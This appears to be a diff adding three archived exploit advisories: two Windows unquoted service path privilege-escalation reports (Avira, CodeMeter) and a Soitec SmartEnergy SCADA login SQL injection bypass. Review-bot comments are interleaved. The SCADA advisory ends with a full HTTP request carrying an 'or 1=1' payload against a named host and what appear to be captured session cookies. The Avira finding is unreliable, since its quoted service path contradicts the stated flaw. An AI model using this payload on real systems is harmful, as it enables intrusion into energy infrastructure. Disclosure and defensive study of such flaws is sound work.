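+# Exploit Title: Avira 14.0.7.342 (avguard.exe) Service Trusted Path Privilege Escalation
+# Date: 11/12/2014
+#Author: Hadji Samir s-dz@hotmail.fr
+#Product web page: http://www.avira.com/
+#Affected version: 14.0.7.342
+#Tested on: Windows 7 (FR)
+
+
+
+
+Avira free antivirus 14.0.7.342
+(avguard.exe)
+Avira free antivirus 14.0.7.342 contains a flaw in the 'avguard.exe' file that may reportedly allow gaining access to unauthorized privileges.
+The issue is due to an unquoted search path, which may allow a local attacker
+to inject arbitrary code in the root path.
+
+
+C:\Users\samir>sc qc AntiVirService
+[SC] QueryServiceConfig réussite(s)
+
+SERVICE_NAME: AntiVirService
+TYPE : 10 WIN32_OWN_PROCESS
+START_TYPE : 2 AUTO_START
+ERROR_CONTROL : 1 NORMAL
+BINARY_PATH_NAME : "C:\Program Files\Avira\AntiVir Desktop\avguard.exe"
+LOAD_ORDER_GROUP :
+TAG : 0
+DISPLAY_NAME : Avira Real-Time Protection
+DEPENDENCIES :
+SERVICE_START_NAME : LocalSystem
+
+C:\Users\samir>icacls "C:\Program Files\Avira\AntiVir Desktop\avguard.exe"
+C:\Program Files\Avira\AntiVir Desktop\avguard.exe AUTORITE NT\Système:(I)(F)
+BUILTIN\Administrateurs:(I)(F)
+BUILTIN\Utilisateurs:(I)(RX)
+
+1 fichiers correctement traités ; échec du traitement de 0 fichiers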
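--- a/platforms/windows/local/35542.txt
+++ b/platforms/windows/local/35542.txt
@@ -0,0 +1,41 @@
+# Exploit Title:CodeMeter 4.50.906.503 Service Trusted Path Privilege Escalation
+# Date: 07/12/2014
+#Author: Hadji Samir s-dz@hotmail.fr
+#Product web page: http://www.wibu.com/fr/codemeter.html
+#Affected version: 4.50.906.503
+#Tested on: Windows 7 (FR)
+
+'CodeMeter.exe '
+CodeMeter represents the basic technology of all protection and licensing solutions from Wibu-Systems.
+
+CodeMeter contains a flaw in the 'CodeMeter.exe'
+file that may reportedly allow gaining access to unauthorized privileges.
+The issue is due to an unquoted search path, which may allow a local attacker
+to inject arbitrary code in the root path.
+
+
+C:\Users\samir>sc qc CodeMeter.exe
+[SC] QueryServiceConfig réussite(s)
+
+SERVICE_NAME: CodeMeter.exe
+TYPE : 10 WIN32_OWN_PROCESS
+START_TYPE : 2 AUTO_START
+ERROR_CONTROL : 1 NORMAL
+BINARY_PATH_NAME : C:\Program Files\CodeMeter\Runtime\bin\CodeMeter.exe
+LOAD_ORDER_GROUP :
+TAG : 0
+DISPLAY_NAME : CodeMeter Runtime Server
+DEPENDENCIES : Tcpip
+: Winmgmt
+SERVICE_START_NAME : LocalSystem
+
+
+
+
+
+C:\Users\samir>icacls "C:\Program Files\CodeMeter\Runtime\bin\CodeMeter.exe"
+C:\Program Files\CodeMeter\Runtime\bin\CodeMeter.exe AUTORITE NT\Système:(I)(F)
+BUILTIN\Administrateurs:(I)(F)
+BUILTIN\Utilisateurs:(I)(RX)
+
+1 fichiers correctement traités ; échec du traitement de 0 fichiers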
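Review bot: The `BINARY_PATH_NAME : C:\Program Files\CodeMeter\Runtime\bin\CodeMeter.exe` line is genuinely unquoted, so the unquoted-search-path class is plausible here, but the `icacls` run that follows is on the executable itself, which says nothing about that class and only shows Users at `(RX)`. What decides whether an unquoted path is actually exploitable is whether a non-administrative principal holds create or write rights on the intermediate directories along the path, so the advisory should show `icacls` for those directories rather than for the binary. For operators the mitigation is to re-register the service with the path quoted, e.g. `sc config CodeMeter.exe binPath= "\"C:\Program Files\CodeMeter\Runtime\bin\CodeMeter.exe\""`, and to confirm with `sc qc CodeMeter.exe` that the quotes are now present.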
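--- a/platforms/windows/webapps/35529.txt
+++ b/platforms/windows/webapps/35529.txt
@@ -0,0 +1,63 @@
+?
+Soitec SmartEnergy 1.4 SCADA Login SQL Injection Authentication Bypass Exploit
+
+
+Vendor: Soitec
+Product web page: http://www.soitec.com
+Affected version: 1.4 and 1.3
+
+Summary: Soitec power plants are a profitable and ecological investment
+at the same time. Using Concentrix technology, Soitec offers a reliable,
+proven, cost-effective and bankable solution for energy generation in the
+sunniest regions of the world. The application shows how Concentrix technology
+works on the major powerplants managed by Soitec around the world. You will
+be able to see for each powerplant instantaneous production, current weather
+condition, 3 day weather forecast, Powerplant webcam and Production data history.
+
+Desc: Soitec SmartEnergy web application suffers from an authentication bypass
+vulnerability using SQL Injection attack in the login script. The script fails
+to sanitize the 'login' POST parameter allowing the attacker to bypass the security
+mechanism and view sensitive information that can be further used in a social
+engineering attack.
+
+Tested on: nginx/1.6.2
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+@zeroscience
+
+
+Vendor status:
+
+[16.11.2014] Vulnerability discovered.
+[02.12.2014] Vendor contacted.
+[08.12.2014] Vendor responds asking more details.
+[08.12.2014] Sent details to the vendor.
+[09.12.2014] Vendor confirms the vulnerability.
+[12.12.2014] Vendor applies fix to version 1.4.
+[14.12.2014] Coordinated public security advisory released.
+
+
+Advisory ID: ZSL-2014-5216
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5216.php
+
+
+16.11.2014
+
+---
+
+
+
+POST /scada/login HTTP/1.1
+Host: smartenergy.soitec.com
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://smartenergy.soitec.com/scada/login
+Cookie: csrftoken=ygUcdD2i1hFxUM6WpYB9kmrWqFhlnSBY; _ga=GA1.2.658394151.1416124715; sessionid=ixi3w5s72yopc29t9ewrxwq15lzb7v1e
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 87
+
+csrfmiddlewaretoken=ygUcdD2i1hFxUM6WpYB9kmrWqFhlnSBY&login=%27+or+1%3D1--&password=blah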
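Review bot: Line 1 of 35529.txt is a stray `?`, almost certainly a mis-decoded UTF-8 byte-order mark, and should be dropped so the advisory opens with its title. The sample request at the end carries what appear to be the author's live `csrftoken` and `sessionid` cookie values; advisories conventionally replace such values with placeholders such as `sessionid=<redacted>`, since they were session credentials at the time of capture and add nothing to the demonstration. `Affected version: 1.4 and 1.3` also sits uneasily with `[12.12.2014] Vendor applies fix to version 1.4` — it is unclear whether 1.4 is vulnerable or is the fixed release; one sentence naming the patched 1.4 build would resolve it.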